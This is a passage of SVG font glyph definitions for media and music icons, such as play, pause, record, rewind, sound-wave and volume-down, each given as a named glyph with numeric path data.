<glyph glyph-name="music-alt" horiz-adv-x="1000" unicode="&#xec9f;" d="M857 602c-41 87-130 146-262 178h-1c-9 2-19 4-28 6-67 10-96-21-101-50l-75-505c-25 12-53 19-82 19-50 2-98-15-134-46-36-31-56-73-57-118-2-84 66-158 157-171 9-2 18-2 27-2 96-3 176 63 190 155l74 495c7 0 14-1 21-2 84-13 156-59 208-135 21-31 35-61 43-80 2-5 7-8 12-8 5 0 10 3 11 8 19 55 43 160-3 256z" />
<glyph glyph-name="music-disk" horiz-adv-x="1000" unicode="&#xeca0;" d="M387 387c13 0 21 8 22 22-1 13-8 22-22 21-14 0-22-8-21-22 0-13 8-20 21-21z m-15-184c77 65 201 87 291 33 2 0 4-1 6-1 3 6 1 13 1 19 0 138 1 275 0 413 0 1 0 2 0 4-70 76-171 125-283 125-214 0-387-174-387-387 0-191 128-348 310-378-32 54 0 119 62 172z m-235 329c-3-5-7-10-11-15-3-4-6-8-12-6-5 2-5 8-5 13-1 7 2 14 6 20 32 60 78 104 137 136 1 0 1 0 2 0 10 3 22 14 29 1 8-15-9-18-17-23-56-29-99-71-129-126z m84-30c-3-3-7-6-11-4-5 2-5 7-5 12 0 2 0 5 1 8 17 34 44 60 79 76 5 2 11 2 15-4 3-6 1-12-4-16-31-18-53-45-75-72z m167 16c61 0 109-48 109-110-1-61-49-109-111-108-61 0-108 48-108 110 0 61 49 109 110 108z m602-96c-25 59-74 96-130 128-27 15-54 29-82 43-12 6-19 14-16 29 3 20-3 36-22 46h-14c-20-8-25-23-25-44 0-138 0-275 0-413 0-6 2-12-2-19-2 1-3 1-5 2-91 53-222 33-299-32-92-77-76-194 34-240 91-38 215-14 285 56 32 32 49 69 48 115-1 117 0 234-1 351 0 13 1 19 16 17 54-10 103-29 144-66 28-25 50-54 67-88 21 51 10 95 2 115z" />
<glyph glyph-name="music-note" horiz-adv-x="1000" unicode="&#xeca1;" d="M911 104c5 15 5 30 5 46 2 30 3 59 5 89 1 38 3 76 4 114 2 32 3 63 5 94 1 39 3 78 5 116 1 23 1 46 2 70 2 31 3 62 5 93 0 8-1 17 1 26 0 1 0 2 0 4 0 1-1 0-2 0-4-1-9-1-13-1-36-3-72-6-109-8-36-3-72-6-107-9-31-2-62-4-92-7-31-2-61-4-92-7l-92-7c-20-1-40-3-60-4-2 0-3-1-3-4-1-30-3-61-4-91-1-28-2-57-3-85-2-35-3-71-4-107-1-28-3-56-4-84-1-35-2-71-4-107-1-19-1-39-2-58 0-3-1-4-4-2-22 11-46 16-71 15-46-2-88-15-121-49-16-16-27-33-31-55 0-2 0-4-1-6v-20c1-6 2-13 4-19 7-23 22-40 41-54 24-17 51-26 81-27 0 0 1 0 2-1h14c1 1 2 1 3 1 9 0 18 2 27 4 36 7 67 24 91 52 14 16 23 35 26 56 2 16 2 32 2 48 2 26 3 51 4 77 1 34 2 69 4 103 1 26 2 51 3 77l5 114c1 23 2 45 3 67 0 3 1 4 4 5 14 1 28 2 42 4 17 2 34 3 51 5 21 2 42 4 63 6l52 6c20 2 41 4 62 6l52 5c20 2 41 4 61 6 18 2 36 4 54 6 4 0 5-1 5-4-2-20-3-39-4-59-1-23-2-46-3-68-2-23-3-45-4-68-1-22-3-45-4-68-1-29-3-58-5-87 0-10-1-19-1-29-2 0-3 1-4 2-22 10-44 16-68 17-15 0-29-1-44-4-38-8-70-25-93-56-26-33-31-69-12-106 11-24 31-38 54-49 28-13 57-17 87-14 35 3 66 15 93 38 17 14 31 31 39 52z m-802 170c11 1 17 11 15 23-2 13-11 17-24 16-14-2-27-6-40-12-30-14-52-37-59-67-1-6-2-11 0-16 9-21 33-18 39-1 11 34 33 53 69 57z m875-211c-15 2-21-7-24-21-6-28-24-46-51-55-27-8-36-31-10-42 5-2 11-2 15 0 8 3 14 6 21 9 34 16 57 42 64 81 3 13 0 25-15 28z m-738 180c-3 16-16 18-30 15-11-1-21-3-32-6-69-20-113-65-133-133-5-17 3-28 15-28 15 0 21 7 23 17 6 21 16 40 29 56 27 33 62 50 104 55 14 2 27 7 24 24z" />
<glyph glyph-name="music-notes" horiz-adv-x="1000" unicode="&#xeca2;" d="M490 436l327 53v-444c0-36-27-66-70-76-47-12-92 8-101 44-9 36 22 74 69 86 21 5 42 4 59-2v267l-240-44-1-332c0-32-28-63-69-72-46-12-95 10-100 43-9 36 21 74 68 85 21 6 41 5 58-1v393z m-123-163l2 411s89 5 177-132c0 0 0 70-67 122-132 92-131 114-131 114-26-3-28-22-28-22v-433c-19 7-41 8-64 2-51-12-85-55-75-94 6-36 59-60 110-47 45 11 76 45 76 79z m238 266c16 3 27 15 27 27l0 143s31 2 62-46c0 0 0 25-24 43-45 32-45 39-45 39-9-1-10-7-10-7v-151c-6 3-14 3-22 1-18-5-30-19-26-33 2-12 20-21 38-16z m154-1c11 3 19 11 19 20l0 99s22 1 43-32c0 0 0 17-16 30-32 22-32 27-32 27-6-1-7-5-7-5v-105c-4 2-10 2-15 0-13-2-21-13-18-22 1-9 14-15 26-12z" />
<glyph glyph-name="music" horiz-adv-x="1000" unicode="&#xeca3;" d="M815 784l-379-116c-46-13-83-60-83-106v-400s-27 19-88 10c-90-12-163-81-163-153s73-117 163-104c89 12 155 79 155 151v341c0 32 39 46 39 46l334 105s38 12 38-22v-274s-35 20-96 13c-89-11-162-79-162-151 0-72 73-118 162-107 90 11 163 78 163 150v558c0 46-37 72-83 59z" />
<glyph glyph-name="mute-volume" horiz-adv-x="1000" unicode="&#xeca4;" d="M209 531h-19c-28 0-50-23-50-51v-251c0-28 22-51 50-51h19c28 0 51 23 51 51v251c0 28-23 51-51 51z m471-58c-68 0-123-55-123-123 0-68 55-123 123-123 67 0 122 55 122 123 0 68-55 123-122 123z m56-171l-9-8c-3-4-9-4-12 0l-29 28c-4 4-9 4-13 0l-29-29c-3-3-9-3-13 1l-8 8c-3 4-3 9 0 13l29 29c3 3 3 9 0 12l-29 29c-3 3-3 9 0 13l8 8c4 4 10 4 13 0l29-28c4-4 9-4 13 0l29 28c3 4 9 4 12 0l9-8c3-4 3-10 0-13l-29-29c-4-3-4-9 0-12l29-29c3-4 3-9 0-13z m-57 230v227c0 28-17 37-39 20l-278-223c-22-18-40-54-40-83v-246c0-28 18-65 40-83l278-222c22-18 39-9 39 19v227c101 0 182 82 182 182 0 100-81 182-182 182z m0-346v0c-90 0-163 74-163 164 0 91 73 164 163 164 91 0 165-73 165-164s-74-164-165-164z" />
<glyph glyph-name="pause" horiz-adv-x="1000" unicode="&#xeca5;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m-78-654c0-31-25-56-56-56s-56 25-56 56v310c0 31 25 56 56 56s56-25 56-56v-310z m260 0c0-31-25-56-56-56s-56 25-56 56v310c0 31 25 56 56 56s56-25 56-56v-310z" />
<glyph glyph-name="play-alt-1" horiz-adv-x="1000" unicode="&#xeca6;" d="M0 350c-1-290 241-498 500-494 256-4 500 200 500 493 0 289-237 490-491 494-265 5-508-202-509-493z m407 228c114-69 226-138 340-208 19-12 19-41 0-53l-340-208c-20-13-47 2-47 26v417c0 24 27 39 47 26z" />
<glyph glyph-name="play-alt-2" horiz-adv-x="1000" unicode="&#xeca7;" d="M501 850c-278 0-501-224-501-503 3-276 224-497 501-497 137 0 256 50 353 147 97 97 146 216 146 353 1 275-224 500-499 500z m4-920c-230 0-417 186-417 415 0 231 186 418 417 417 231-1 416-186 415-418-1-230-186-413-415-414z m40 523c-49 30-98 59-147 89-4 3-7 3-6-4 0-1 0-2 0-4v-388c0-12 0-12 11-6 105 55 209 110 314 165 12 7 24 13 38 21-3 2-4 3-6 4-68 41-136 82-204 123z" />
<glyph glyph-name="play-alt-3" horiz-adv-x="1000" unicode="&#xeca8;" d="M126 203c-29 73-36 149-21 226 31 166 169 298 337 321 7 1 10 4 10 11-1 23-1 46-1 69 0 21 0 21-20 18-118-17-218-69-299-156-57-61-95-132-116-210-9-34-34-157 11-294 3-11 8-22 12-33 4-8 7-10 14-5 22 13 45 26 68 39 6 4 8 6 5 14z m851 296c-24 80-66 149-123 206-25 25-119 108-259 139-12 2-24 4-36 6-8 1-11-1-11-10 1-26 1-52 0-78 0-8 1-11 9-12 79-11 147-44 207-95 128-111 172-296 107-453-3-7-2-10 4-14 20-11 40-23 60-35 18-10 18-10 26 9 45 111 51 223 16 337z m-80-436c-23 13-46 26-68 40-6 4-10 4-14-2-49-62-112-106-187-131-159-55-342-1-445 134-5 6-8 7-14 3-20-11-40-23-60-34-18-10-18-10-6-27 73-94 168-155 284-183 81-19 161-17 240 4 34 9 153 48 250 154 8 9 15 19 23 28 5 7 5 10-3 14z m-713 290c0-183 152-314 316-312 161-2 315 126 315 311 0 183-150 309-310 312-167 3-321-127-321-311z m227 162c91-56 180-111 271-166-90-56-180-111-271-167v333z" />
<glyph glyph-name="play-pause" horiz-adv-x="1000" unicode="&#xeca9;" d="M498 850c-274-2-498-228-496-501 1-276 228-501 502-499 275 2 497 227 495 501-2 278-226 501-501 499z m-41-538c-60-35-120-70-180-103-36-20-57-6-58 36-1 33 0 66 0 99h0c0 35-1 70 0 105s24 50 55 33c62-35 124-70 184-107 31-19 30-45-1-63z m139-92c0-25-20-45-45-45s-45 20-45 45v249c0 25 20 46 45 46s45-21 45-46v-249z m176 0c0-25-20-45-45-45s-45 20-45 45v249c0 25 20 46 45 46s45-21 45-46l0-249z" />
<glyph glyph-name="play" horiz-adv-x="1000" unicode="&#xecaa;" d="M147-88c-8 6-13 13-13 23 1 277 1 553 1 829 0 9 1 16 9 21 8 5 15 2 23-3 228-138 457-275 686-413 18-11 18-26-1-38-228-137-456-275-684-413l-10-6h-11z m25 52c214 129 426 257 640 386-214 129-427 257-640 386v-772z" />
<glyph glyph-name="record" horiz-adv-x="1000" unicode="&#xecab;" d="M273 452c0 59-1 119 1 178 2 105 78 195 181 215 118 24 233-47 265-164 5-18 7-36 7-55 0-116 0-231 0-346 0-113-85-208-197-223-122-16-232 65-254 186-3 15-3 30-3 45v164c0 0 0 0 0 0z m227-69c52 0 103 0 154 0 7 0 11 1 10 9 0 78 1 157 0 235-1 104-101 180-202 155-74-17-126-83-126-162-1-75 0-151-1-226 0-9 3-11 11-11 52 0 103 0 154 0z m0-533c-32 0-64 0-96 0-15 0-26 8-30 21-4 12 0 25 10 33 6 5 14 7 22 7 16 0 33 0 49 0 6 0 8 1 8 7 0 10 0 20 0 30 1 6-3 8-8 9-143 20-257 131-279 273-4 21-5 43-4 65 0 7-2 11-7 15-13 9-19 21-19 37l0 65c0 26 20 46 45 46 26 0 47-19 47-45 1-22 1-45 1-67-1-16-7-28-20-37-3-2-6-5-6-10-3-106 38-191 124-253 139-99 339-49 417 103 25 47 35 97 33 150 0 5-2 7-5 10-13 9-20 22-20 39 0 21 0 43 0 64 0 27 20 46 46 46 26 0 46-20 46-46v-65c0-15-5-28-17-36-6-5-8-10-8-17 1-59-11-117-40-169-54-95-135-151-243-168-7-1-10-3-10-10 1-9 1-18 0-27 0-7 3-9 10-9 16 0 32 0 48 0 20 0 34-13 34-30 0-18-14-31-34-31-31 0-63 0-94 0z m108 797c0-25-19-43-44-43-25 0-44 19-44 44 0 25 19 44 44 44 25 0 44-19 44-45z m-216-142c0 25 19 44 44 45 24 0 45-20 45-45 0-24-20-44-44-44-25-1-45 19-45 44z m216 0c0-25-20-45-44-44-25 0-44 20-44 44 0 25 20 45 44 45 25-1 44-20 44-45z m-216 143c0 25 19 44 44 44s45-19 45-44c0-25-20-44-45-44-25 0-44 19-44 44z" />
<glyph glyph-name="retro-music-disk" horiz-adv-x="1000" unicode="&#xecac;" d="M500 322c18 0 27 10 29 28-1 17-11 28-28 28-18-1-28-11-28-29 0-17 11-26 27-27z m0 528c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m-233-359c22 44 56 77 102 98 6 3 14 3 19-4 5-9 2-17-6-21-39-24-68-58-96-93-4-5-9-8-15-6-6 3-6 9-6 16 0 2 0 6 2 10z m-90 18c-4-7-9-13-13-19-4-6-9-11-16-8-7 3-7 10-7 16-1 10 3 19 7 27 42 77 102 135 179 175 0 1 1 1 2 1 13 3 29 17 38 0 10-19-12-23-23-28-72-39-128-93-167-164z m325-18c79 0 141-63 140-142 0-79-62-141-142-140-80 0-141 63-140 142 0 79 63 141 142 140z m122-362c8 7 15 14 23 20 27 20 47 45 68 70 5 7 12 18 22 10 9-6 6-17 2-26-12-26-31-45-52-64-15-13-31-27-50-29-8 0-14 0-17 6-2 5 1 9 4 13z m16-124c7 6 15 12 23 17 68 38 121 90 160 158 4 7 9 15 14 22 4 5 9 9 16 6 7-2 7-9 8-14-1-12-5-22-10-31-39-71-94-126-165-166-11-7-24-12-38-12-5 0-11 1-13 8-2 5 1 9 5 12z" />
<glyph glyph-name="rewind" horiz-adv-x="1000" unicode="&#xecad;" d="M502-150c274 2 498 228 497 501-1 276-229 501-502 499-275-2-498-227-496-501 2-278 226-501 501-499z m-220 533c59 35 119 69 180 102 35 20 57 6 58-35 0-9 0-18 0-26 36 20 71 41 108 61 35 20 57 6 58-35 0-33 0-67 0-100h0c0-35 1-70 0-105-2-35-25-49-55-32-38 20-74 42-111 64 0-11 0-21-1-32-1-35-24-49-54-32-63 34-124 70-185 106-30 19-29 45 2 64z" />
<glyph glyph-name="song-notes" horiz-adv-x="1000" unicode="&#xecae;" d="M992 521l-7 8c-15 0-23-7-19-18 11-21 10-40-5-59-5-5-3-13 3-17 7-5 14-3 19 3 5 8 10 16 13 25 8 20 3 39-4 58z m-339-529c0 3 1 7 0 10-6 13-22 11-26 1-7-23-22-35-45-38-8-1-12-7-10-15 1-9 7-12 15-11 10 2 18 4 27 8 20 9 34 25 39 45z m-581 326c7 1 11 7 10 15-2 9-8 12-16 11-9-2-18-4-27-8-19-9-34-24-38-44-1-4-2-7 0-11 5-13 21-11 25 0 8 22 22 34 46 37z m594-341c-10-29-29-46-60-49-9-2-15-9-13-20 2-11 10-15 21-14 12 2 24 5 35 10 26 12 45 33 50 59 1 4 2 9 0 13-7 18-28 15-33 1z m-127 458c-12-5-15-2-18 8-5 19-11 38-16 56-3 7-2 13 3 19 40 50 46 106 25 166-20 57-79 100-135 98 1-5 1-9 3-13 18-69 37-137 57-206 2-10 1-16-6-24-46-51-85-106-102-174-16-70-4-131 51-181 42-38 93-54 149-55 28-1 28-1 35-30 4-18 6-36-1-54-7-18-23-28-44-27-16 1-29 7-35 23-1 6-5 13 8 13 17-2 28 9 30 24 2 18-5 29-23 34-21 6-42-5-50-27-16-40 7-83 51-97 45-15 86 7 98 52 7 28 3 55-5 82-3 10-3 15 8 19 36 14 63 39 81 73 33 60 33 120-5 178-32 47-102 66-159 43z m-23-85c10-34 18-65 27-97-34 13-46 56-27 97z m-84 396c-1 3-3 7 0 10 3 3 7 0 10-2 10-4 19-10 26-18 32-39 43-85 33-135-2-11-7-20-18-28-17 59-34 116-51 173z m-19-459c-13 76 13 140 66 198 7-25 13-47 19-70 2-7-4-10-8-14-50-59-32-147 35-177 9-3 18-6 27-9 1 0 2-2 3-4 3-12 6-25 10-38-68-9-140 43-152 114z m171-40c-12 0-15 18-17 25-4 10-3 15-1 28 3 13 8 24 24 25 16 0 23-9 27-22 1-4 2-9 2-11 1-14-3-25-12-34-6-6-15-12-23-11z m35-63c-17-8-18-14-26 11-1 4-2 7-3 11-2 9-2 11 7 14 29 11 46 33 50 63 4 25-4 47-27 61-23 13-45 9-67-8-2 6-4 11-5 16-9 30-7 33 23 42 44 14 93-12 110-59 19-54-9-126-62-151z m-360 381c-9 2-12-5-13-12-1-2-1-3-2-5-12-83-26-167-38-250-2-12-3-14-14-7-39 24-80 26-119 4-43-24-42-71 0-96 18-11 38-16 59-15 18-1 36 3 52 11 19 11 33 25 36 49 6 50 15 99 23 148 8 52 16 105 24 157 1 8 0 14-8 16z m639-22c-41 15-80 9-116-18-14 90-28 178-42 266-1 9-3 17-13 15-11-2-10-11-9-19 15-94 30-188 44-281 4-25 7-49 31-65 34-21 92-21 125 3 16 12 28 27 25 49-3 28-22 42-45 50z" />
<glyph glyph-name="sound-wave-alt" horiz-adv-x="1000" unicode="&#xecaf;" d="M439 82c-1 5-1 10-1 15 0 167 0 335 0 503 0 18 0 18 18 18 34 0 34 0 34-34 0-161 0-323 0-484 0-6 0-12-1-18h-50z m561 242c-14 0-27 0-41 0-8-1-11 3-11 11 2 50-8 39 39 41 4 0 9-1 13-1v-51z m-635 26c0 52 1 104 0 156 0 11 3 16 15 15 9-1 18 0 27 0 7 0 11-4 10-11 0-2 0-4 0-6v-309c0-17 0-17-16-17-8 0-15 1-22 0-11-1-14 4-14 14 1 53 0 105 0 158z m198-1c0-52 0-104 0-156 0-11-3-16-14-15-10 1-19 1-28 0-7 0-11 4-10 11 0 2 0 4 0 6v309c0 16 0 17 16 17 36 0 36 0 36-36 0-46 0-91 0-136z m-293-1c0-36 0-71 0-107 0-11-3-15-13-14-9 0-17 0-26 0-10-1-13 4-13 13 0 20 0 41 0 61 0 52 0 104 0 156 0 12 4 16 16 16 36-1 36 0 36-37 0-29 0-58 0-88z m365 0c0-28 0-56 1-84 0-10-3-14-13-13-9 0-18 0-27 0-10-1-13 4-13 13 0 45 0 90 0 135 0 12 0 25 0 38 0 8 3 11 11 11 10 0 19 0 29 0 10 1 13-3 13-13-1-29-1-58-1-87z m168 2c0 28 0 55 0 82 0 16 0 16 17 16 8 0 16 0 24 0 8 1 11-3 11-11 0-58 0-116 0-174 0-8-3-12-11-12-10 0-19 0-29 0-9-1-12 3-12 12 0 29 0 58 0 87z m-605 0c0-21-1-41 0-62 0-9-3-13-13-13-9 1-19 0-29 0-6 0-10 3-10 10 0 43 0 86 0 129 0 7 3 10 10 10 10 0 21 0 31 0 8 0 11-4 11-12-1-21 0-41 0-62z m147-1c0-21-1-41 0-62 0-8-3-12-12-12-10 1-19 1-28 0-10 0-13 4-12 13 0 41 0 82 0 123-1 9 2 14 12 13 9 0 18-1 27 0 10 1 13-4 13-14-1-20 0-41 0-61z m363 1c0-21 0-42 0-63 0-9-3-12-12-12-10 1-20 0-30 0-7 0-10 3-10 10 0 43 0 87 0 130 0 6 3 9 9 9 11 0 22 0 33 0 8 0 10-4 10-11 0-21 0-42 0-63z m168 0c0 16 0 33 0 50 0 9 3 12 11 12 10 0 20 0 30 0 7 0 11-2 11-10 0-35 0-70 0-105 0-7-4-10-11-10-10 0-20 1-30 0-8 0-11 4-11 12 0 17 0 34 0 51z m-751-1c0-13 0-26 0-39 0-8-3-11-10-11-11 1-21 1-32 0-7 0-10 3-10 10 0 27 0 54 0 81 0 7 3 10 9 10 11 0 22 0 33 0 7 0 10-4 10-11 0-13 0-26 0-40z m657 1c0-13 0-25 1-38 0-9-3-13-12-13-10 1-20 1-30 0-8 0-10 4-10 11 0 26 0 53 0 79 0 8 3 11 11 11 10 0 20 0 30 0 7 0 11-4 11-11-1-13-1-26-1-39z m-730-1c0-28 4-25-26-25-29 0-26-3-26 25 0 30-3 26 27 26 29 1 25 3 25-26z" />
<glyph glyph-name="sound-wave" horiz-adv-x="1000" unicode="&#xecb0;" d="M892 315c-17 0-29 6-37 21-9 15-15 31-22 47-6 12-12 24-21 34-25 26-60 23-79-7-15-23-20-49-26-74-5-23-10-46-19-67-2-4-4-9-9-9-6 0-6 6-7 10-10 35-14 72-18 108-8 58-11 117-32 173-4 12-10 24-19 34-20 28-42 23-56 15l0 0c-1 0-2-1-3-1-2-2-4-3-6-4 0-1-1-1-1-1-1-1-1-1-1-1-1-1-2-2-2-2l0 0c-3-3-6-6-8-9l0 0c-5-7-10-15-13-24-6-15-11-30-14-46-17-79-18-160-27-240-3-34-7-68-15-101-1-4-1-9-7-9-4 0-5 5-6 8-7 17-12 35-15 53-11 49-17 100-30 148-6 23-12 45-27 64-20 25-52 25-73 1-7-7-12-16-16-25-16-38-21-79-29-118-4-23-8-46-16-68-1-4-2-7-7-7-5-1-6 3-7 6-3 8-6 15-9 23-9 27-17 55-33 79-17 24-40 36-70 36-32 0-65 0-98 0-5 0-9 1-14-2v-48c5-2 9-2 14-2 31 0 62 0 93 1 17 0 28-8 36-22 10-18 15-37 22-56 6-18 12-35 23-50 24-35 67-33 88 3 18 29 23 61 29 94 6 31 10 62 19 93 1 4 3 8 4 11 2 4 3 8 7 7 4 0 5-4 6-7 7-18 11-37 15-57 10-51 17-103 32-153 3-10 6-20 10-30 10-23 24-43 50-50h10c22 6 33 22 41 42 15 37 19 77 24 117 8 74 10 149 22 223 3 19 7 38 13 56 1 4 2 10 7 10 7 1 7-6 9-10 11-28 15-57 20-87 8-57 10-116 24-173 3-16 8-31 16-45 20-39 59-31 79-12 17 17 26 38 32 61 9 28 15 57 23 85 1 5 1 12 8 12 6 1 7-7 9-11 8-19 16-38 27-55 18-29 43-45 78-44 37 2 73 1 110 1v50c-36 1-72 2-108 1z" />
<glyph glyph-name="stop" horiz-adv-x="1000" unicode="&#xecb1;" d="M510 850c-286 5-511-226-510-500-1-271 218-497 494-500 280-3 506 223 506 500 0 273-219 495-490 500z m141-727h-302c-42 0-76 34-76 76v302c0 42 34 76 76 76h302c42 0 76-34 76-76v-302c0-42-34-76-76-76z" />
<glyph glyph-name="video-alt" horiz-adv-x="1000" unicode="&#xecb2;" d="M0 826v-952c0-13 11-24 25-24l951 1c13 0 24 11 24 24v951c0 13-11 24-24 24h-951c-14 0-25-11-25-24z m673-19h52c14 0 25-11 25-25v-90c0-13-11-24-25-24h-52c-14 0-25 11-25 24v90c0 14 11 25 25 25z m-199 0h54c13 0 24-11 24-24v-92c0-13-11-24-24-24h-54c-13 0-24 11-24 24v92c0 13 11 24 24 24z m-197 0h54c14 0 25-11 25-25v-90c0-14-11-25-25-25h-54c-14 0-25 11-25 25v90c0 14 11 25 25 25z m-209 0h65c14 0 25-11 25-24v-90c0-14-11-25-25-25h-65c-13 0-24 11-24 25v90c0 13 11 24 24 24z m-1-183h865c13 0 24-11 24-24v-499c0-13-11-24-24-24h-865c-13 0-24 11-24 24v499c0 13 11 24 24 24z m66-731h-65c-13 0-24 11-24 25v90c0 14 11 25 24 25h65c14 0 25-11 25-25v-90c0-14-11-25-25-25z m198 0h-54c-14 0-25 11-25 25v90c0 14 11 25 25 25h54c14 0 25-11 25-25v-90c0-14-11-25-25-25z m197 0h-54c-14 0-24 11-24 24v91c0 14 11 25 24 25h54c13 0 24-11 24-25v-91c0-13-11-24-24-24z m197 0h-52c-13 0-24 11-24 25v90c0 14 11 25 24 25h52c14 0 25-11 25-25v-90c0-14-11-25-25-25z m207-1h-61c-14 0-25 11-25 25v91c0 14 11 25 25 25h61c13 0 24-11 24-25v-91c0-14-11-25-24-25z m0 776h-61c-13 0-24 11-24 24v91c0 14 11 25 24 25h61c14 0 25-11 25-25v-91c0-13-11-24-25-24z m-274-313c-75 40-147 78-219 116-12 6-26-2-26-15v-234c0-13 14-21 26-15 73 39 145 77 219 117 13 6 13 24 0 31z" />
<glyph glyph-name="video-cam" horiz-adv-x="1000" unicode="&#xecb3;" d="M261 399c138 0 277 0 415 0 13 0 13 1 11 13-7 31-32 50-66 50-63 0-127 0-190 0-121 0-242 0-363 0-24 0-43-8-57-27-5-7-11-14-11-22v-458l0-11c0 0 0-1 0-1 10-29 34-44 65-44 187 0 374 0 561 0 34 0 62 27 62 61 0 122-1 245 0 367 0 8-3 10-11 10-109 0-219 0-328 0-30 0-60 0-90 0-7 0-9 2-9 9 0 14 1 28 0 42-1 9 2 11 11 11z m215-157c67 0 123-55 125-119 3-72-55-128-120-131-72-2-127 56-129 120-3 69 52 130 124 130z m-289-217c-34 0-61 28-61 62 0 34 28 62 62 62s62-29 62-63c-1-34-29-62-63-61z m764 463c-1-1-1-1-2-2-50-37-100-73-149-112-32-25-49-59-50-100 0-61 0-122 0-183 0-44 19-81 54-108 47-36 95-72 143-107 5-4 11-8 18-11 15-5 27-2 33 13 1 1 2 4 2 7v590c0 23-26 29-49 13z m-445 36c82 2 154 73 151 163-3 81-73 150-157 150-91 0-160-77-156-163 3-81 72-153 162-150z m-377 0c66 2 123 58 121 130-2 64-59 119-125 119-73 0-128-61-125-130 3-64 58-122 129-119z" />
<glyph glyph-name="video-clapper" horiz-adv-x="1000" unicode="&#xecb4;" d="M866 518h-485c-7 0-13 0-13 0s6 3 12 5c163 44 325 88 487 132 7 1 11 9 10 16-10 35-20 70-29 105-2 7-6 12-9 12-2-1-3-1-5-2-92-25-184-50-276-75-143-38-286-77-430-116-6-1-8-4-8-10 0-43 0-85 0-128v-60c0-158 0-314 0-471 0-8 6-13 13-13h734c7 0 13 5 13 13v457c0 8 0 13 0 13s-1 6-1 13v95c0 8-5 14-13 14z m-136-28h82c7 0 13-5 13-13v-55c0-7-6-13-13-13h-109c-7 0-11 6-9 13 7 19 13 37 19 56 2 7 10 12 17 12z m-201-1c6 5 19 1 28 1h65c7 0 13-1 12-3 0-1 0-2 0-3-8-23-16-46-23-69-2-4-3-6-8-6-33 0-66 0-99 0-1 0-1 0-2 0-1 1 0 6 2 13 5 14 9 27 14 41 3 9 5 21 11 26z m-87-11l-19-56c-2-7-10-13-17-13h-82c-8 0-12 6-9 13 3 9 6 18 9 27 4 12 7 24 12 36 1 2 4 5 6 5 30 1 60 1 91 1 7 0 11-6 9-13z m360 258l15-53c2-7-2-14-9-16-14-4-27-8-40-11-16-4-31-9-46-12-3-1-7 0-8 2-13 18-25 37-38 56-4 6-2 13 5 14l106 29c7 2 14-2 15-9z m-219-46c3 0 8-1 9-3 13-18 25-37 38-56 4-6 2-12-5-14-27-7-53-14-80-22-7-1-15 2-19 8-11 16-22 33-33 49-4 6-2 13 5 15 13 3 26 7 39 10 15 4 31 9 46 13z m-174-52c12-18 25-37 38-57 4-5 1-12-6-14-16-4-31-8-47-13-13-3-26-7-39-10-2-1-7 0-8 2-14 22-29 43-43 65 0 0 0 1 0 1-1 1 5 3 12 5 29 8 57 16 86 23 2 1 6 0 7-2z m-193-93c22 0 41-19 40-42 0-21-19-40-41-40-22 1-40 20-40 41 0 23 18 41 41 41z" />
<glyph glyph-name="video" horiz-adv-x="1000" unicode="&#xecb5;" d="M915 366c-11 0-22 0-32 0-3 0-6-2-9-4-41-24-81-48-122-72v129c0 14-2 26-17 31-6 2-12 3-18 3h-121c57 25 97 82 97 149 0 89-73 162-162 162s-163-73-163-162c0-67 40-124 98-149h-202c33 18 55 52 55 92 0 59-47 107-106 107-59 0-106-48-106-107 0-40 22-74 55-92h-64c-26 0-35-9-35-36v-445c0-28 8-36 36-36h616c5 0 10 0 14 1 13 1 20 9 22 21 1 5 1 10 1 15v126c41-24 82-49 122-73 3-2 6-4 9-4 10 0 21 0 32 0 12 0 23 10 23 23v298c0 13-11 23-23 23z" />
<glyph glyph-name="volume-bar" horiz-adv-x="1000" unicode="&#xecb6;" d="M489 424c0 64 0 129 0 193 0 26-15 35-37 22-81-44-160-89-241-133-7-4-9-8-9-17 0-46 0-92 0-138h0c0-48 0-95 0-143 0-4 0-8 5-10 82-44 164-89 247-132 20-11 35-1 35 22 0 63 0 126 0 188 0 7 2 12 6 17 28 32 28 79 1 112-5 6-7 12-7 19z m473 113c-30 73-75 134-135 185-4 4-7 5-11 1-18-19-36-37-55-55-4-4-3-6 1-9 11-9 22-19 32-29 93-97 130-213 110-345-15-98-63-179-140-243-5-4-5-6 0-11 18-17 36-35 53-53 5-5 8-4 12 0 21 18 40 37 58 59 74 90 112 194 113 313 0 64-12 127-38 187z m-122-126c-16 82-56 150-120 204-5 4-8 4-13-1-16-17-33-34-50-51-6-5-7-8 0-14 80-66 111-150 92-252-11-60-42-109-91-147-6-5-6-7 0-13 16-16 32-31 48-48 7-8 12-8 20-1 78 70 117 157 119 261 0 21-2 41-5 62z m-688 82c-36 0-72 0-109 0-26 0-43-17-43-44 0-67 0-133 0-199 0-25 18-43 42-43 37 0 74 0 110 0 7 0 9 2 9 9 0 45 0 89 0 133 0 45 0 90 0 135 0 7-2 9-9 9z m457 11c-4 2-6 6-12 0-18-19-37-37-56-56-4-4-3-6 2-9 71-42 68-139 2-179-6-3-5-5-1-9 18-18 36-35 53-54 6-5 9-5 15 0 47 39 72 89 74 153-1 62-27 114-77 154z" />
<glyph glyph-name="volume-down" horiz-adv-x="1000" unicode="&#xecb7;" d="M580 350v415c0 4 1 7 0 10-1 11-7 15-16 11-7-3-13-8-18-13-93-81-186-163-278-244-12-10-24-15-39-15-46 0-93 0-139 0-17 0-21-4-21-20v-287c0-17 4-21 21-21 46 0 93 0 140 0 13 0 24-2 34-11 94-83 187-165 281-247 6-5 13-10 20-14 8-4 13 1 15 8 1 5 0 9 0 13v415h0z m155 325c-20-22-41-44-61-66-9-9-9-24 0-34 62-63 111-132 116-223 6-92-35-166-89-235-8-11-7-26 3-34 23-20 46-40 68-59 10-9 25-8 34 2 190 230 151 472-37 650-10 9-25 8-34-1z" />
